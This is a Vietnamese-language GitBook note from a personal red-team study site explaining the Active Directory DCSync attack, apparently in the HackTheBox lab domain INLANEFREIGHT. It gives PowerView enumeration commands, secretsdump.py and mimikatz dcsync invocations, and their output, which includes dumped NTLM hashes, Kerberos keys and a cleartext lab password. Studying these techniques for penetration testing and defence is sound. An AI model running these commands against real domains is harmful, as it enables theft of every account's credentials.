🐸
endy's notes
  • 👋Welcome
  • 💁Blog linh tinh
    • HTB CPTS - review linh tinh
  • 🥷Red Teaming
    • HackTheBox Writeup
      • Web Challanges
      • Machine
    • Priv Escalation
      • 🪟Windows Priv Escalation
        • Windows User Privileges
        • Windows Built-in Groups
        • Attacking the OS
        • Credential Theft
        • Others Techniques
      • 🐧Linux Priv Escalation
    • C2
      • Sliver
    • Active Directory
      • Enumeration
      • Credentials Access
        • Kerberoasting
        • ASREPRoasting
        • DCSync
      • ACL Abuse
        • Khái niệm cơ bản
        • ACL Enumeration
        • Abuse some ACL
      • AD Trust
        • Khái niệm cơ bản
        • Enum AD Trust
        • Attack Child -> Parent Trusts
        • Attack Cross-Forest Trust
    • Lateral Movement
      • Cheatsheet
      • Lateral Movement 101
        • Impacket
        • Windows component
  • 🕸️Web Security
    • XS Leak
    • Java Sec Learn
      • Java Memory shell
        • General
        • Memshell in Tomcat
        • Deserialize to memshell in Tomcat
        • Memshell in Spring
        • Deserialize to memshell in Spring
        • Java Agent Memshell - Demo inject memshell in Jira
    • .Net Sec Learn
      • 🔀.NET Deserialize
        • Làm quen với .NET Serialization
        • Serializer - XmlSerializer và ObjectDataProvider chain
        • Formatter - một vài chain của BinaryFormatter
        • LosFormatter - ViewState deserialize
  • ⛳CTF Writeups
    • Writeup KMA CTF 2024
    • TetCTF2024
      • Hello from API GW (100)
      • Microservices (200)
      • LordGPT
      • X Ét Ét
    • SVATT Cấp học viện 2023
    • KMA CTF 2023
    • TetCTF 2023
    • DiceCTF 2023
Powered by GitBook
On this page
  • Ý tưởng
  • Enumeration
  • Exploit
  1. Red Teaming
  2. Active Directory
  3. Credentials Access

DCSync

PreviousASREPRoastingNextACL Abuse

Last updated 2 months ago

Ý tưởng

Ý tưởng DCSync là lợi dụng cơ chế replicate của AD thông qua Directory Replication Service Remote Protocol để copy toàn bộ db về user và có được tất cả NTLM hash password.

Điều kiện để exploit là ta phải có quyền DS-Replication-Get-Changes-All để có thể yêu cầu DC replicate dữ liệu

Mặc định Domain Admins cũng sẽ có các quyền này

Enumeration

Xác nhận 1 user có quyền để exploit DCSync hay không

$sid= "S-1-5-21-3842939050-3880317879-2865463114-1164"
Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} |select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl

Hoặc nếu có quyền Write thì ta có thể ghi thêm quyền vào user để có thể exploit DCSync

Exploit

Dùng secretsdump.py

secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5 

Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

Password:
[*] Target system bootKey: 0x0e79d2e5d9bad2639da4ef244b30fda5
[*] Searching for NTDS.dit
[*] Registry says NTDS.dit is at C:\Windows\NTDS\ntds.dit. Calling vssadmin to get a copy. This might take some time
[*] Using smbexec method for remote execution
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: a9707d46478ab8b3ea22d8526ba15aa6
[*] Reading and decrypting hashes from \\172.16.5.5\ADMIN$\Temp\HOLJALFD.tmp 
inlanefreight.local\administrator:500:aad3b435b51404eeaad3b435b51404ee:88ad09182de639ccc6579eb0849751cf:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
lab_adm:1001:aad3b435b51404eeaad3b435b51404ee:663715a1a8b957e8e9943cc98ea451b6:::
ACADEMY-EA-DC01$:1002:aad3b435b51404eeaad3b435b51404ee:13673b5b66f699e81b2ebcb63ebdccfb:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:16e26ba33e455a8c338142af8d89ffbc:::
ACADEMY-EA-MS01$:1107:aad3b435b51404eeaad3b435b51404ee:06c77ee55364bd52559c0db9b1176f7a:::
ACADEMY-EA-WEB01$:1108:aad3b435b51404eeaad3b435b51404ee:1c7e2801ca48d0a5e3d5baf9e68367ac:::
inlanefreight.local\htb-student:1111:aad3b435b51404eeaad3b435b51404ee:2487a01dd672b583415cb52217824bb5:::
inlanefreight.local\avazquez:1112:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::

<SNIP>

d0wngrade:des-cbc-md5:d6fee0b62aa410fe
d0wngrade:dec-cbc-crc:d6fee0b62aa410fe
ACADEMY-EA-FILE$:des-cbc-md5:eaef54a2c101406d
svc_qualys:des-cbc-md5:f125ab34b53eb61c
forend:des-cbc-md5:e3c14adf9d8a04c1
[*] ClearText password from \\172.16.5.5\ADMIN$\Temp\HOLJALFD.tmp 
proxyagent:CLEARTEXT:Pr0xy_ILFREIGHT!

  • Khi dùng flag -just-dc ta sẽ nhận được vừa hashes, vừa kerberos key và plaintext password nếu như account được set reversible encryption enabled.

  • Reversible encryption không phải là cơ chế lưu plaintext mà là mã hóa với RC4, key mã hóa sẽ được lưu trong reg (the Syskey). Do đó trong quá trình secretsdump.py exploit thì nó cũng sẽ tự động lấy key và decrypt.

  • Khi ta enable reversible encryption của một account, thì ta phải đổi password của account đó thì reversible encryption mới được áp dụng cho password mới.

Enum user có enable reversible encryption

 # Cách 1
 Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
 # Cách h 2
 Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

Ngoài ra ta cũng có thể dùng mimikatz.exe để exploit. Đương nhiên yêu cầu là ta phải có quyền admin local

.\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\administrator' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : administrator
User Principal Name  : administrator@inlanefreight.local
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 10/27/2021 6:49:32 AM
Object Security ID   : S-1-5-21-3842939050-3880317879-2865463114-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 88ad09182de639ccc6579eb0849751cf

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 4625fd0c31368ff4c255a3b876eaac3d

<SNIP>
🥷